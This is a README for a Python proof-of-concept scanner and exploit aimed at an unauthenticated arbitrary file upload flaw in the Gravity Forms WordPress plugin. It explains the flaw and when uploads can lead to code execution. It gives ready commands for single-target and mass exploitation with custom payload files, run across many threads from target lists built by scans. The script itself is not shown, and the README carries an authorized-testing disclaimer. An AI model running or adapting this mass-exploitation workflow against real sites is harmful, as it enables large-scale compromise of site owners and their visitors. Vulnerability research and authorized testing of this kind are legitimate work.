
Python PoC scanner and exploit for CVE-2026-84434, an unauthenticated arbitrary file upload in Gravity Forms <=3.1.0.4 via hidden File Upload fields. Supports check, exploit, and mass scan modes.
Python 3 PoC scanner and exploit for CVE-2026-84434 in Gravity Forms.
| Plugin | gravityforms |
| Affected | ≤ 3.1.0.4 |
| Fixed in | 3.1.0.5+ (vendor security release 3.1.1) |
| CVSS | 9.8 (Critical) |
| Auth | Unauthenticated |
| CWE | CWE-434 — Unrestricted Upload |
| Credit | 0xd4rk5id3 — EnvoraSec (Wordfence) |
Hidden File Upload fields skip extension validation in the validation pipeline, while the persistence path may still call upload_file() without equivalent checks. An unauthenticated attacker can POST to a public form that includes a File Upload field with Visibility → Hidden.
Files are stored under wp-content/uploads/gravity_forms/. Gravity Forms typically adds .htaccess rules to block PHP execution; RCE depends on server configuration (nginx, alternate docroot, etc.).
gform_wrapper and a hidden fileupload field (input_{form}_{field})gform_submit, is_submit_{id}, file on hidden input)pip install -r requirements.txtpip install -r requirements.txt
# Check single target
python poc.py -u https://target.example --mode check
# Mass check
python poc.py --list targets.example.txt --mode check --threads 30 --quiet
# Exploit (built-in benign .txt probe unless --payload-file is set)
python poc.py -u https://target.example --mode exploit \
--form-id 3 --page-url /contact/ --file-field 7
# Custom upload file (your own probe — not included in this repo)
python poc.py -u https://target.example --mode exploit \
--form-id 3 --page-url /contact/ --file-field 7 \
--payload-file probe.txt
# Mass exploit from check output
python poc.py --list candidates.jsonl --mode exploit --threads 10 --quiet
| Option | Description |
|---|---|
-u, --url | Single target base URL |
--list | URL list, FOFA-style CSV, or candidates.jsonl |
--mode | check (default) or exploit |
--form-id | Gravity Form ID |
--page-url | Path or URL of the page hosting the form |
--file-field | Hidden file upload field ID |
--payload-file | Local file to upload (default: in-memory benign .txt marker) |
--paths | Extra paths to crawl for forms |
--threads, -j | Mass concurrency (default 20) |
--output | JSONL results (default cve_2026_84434_results.jsonl) |
--vuln-list | Hit URLs or exploit successes (default hits.txt) |
--candidates-list | Check metadata (default candidates.jsonl) |
--quiet | Less progress output on mass runs |
| File | Content |
|---|---|
cve_2026_84434_results.jsonl | Full JSON per target |
hits.txt | Candidate base URLs |
candidates.jsonl | form_id, page_url, file_field / input_name |
status values (check)| Status | Meaning |
|---|---|
candidate | Vulnerable version + hidden file upload on a public form |
forms_no_hidden_upload | Forms found, none with hidden file upload in HTML |
plugin_no_public_forms | Plugin present, no public form discovered |
patched | Version > 3.1.0.4 |
no_plugin | Gravity Forms not detected |
.
├── poc.py
├── requirements.txt
├── targets.example.txt
├── README.md
├── LICENSE
└── .gitignore
Local scan lists and artifacts (list.txt, *.jsonl, custom payloads) are in .gitignore and should not be committed.
For authorized security testing only. You are responsible for compliance with applicable laws and program rules.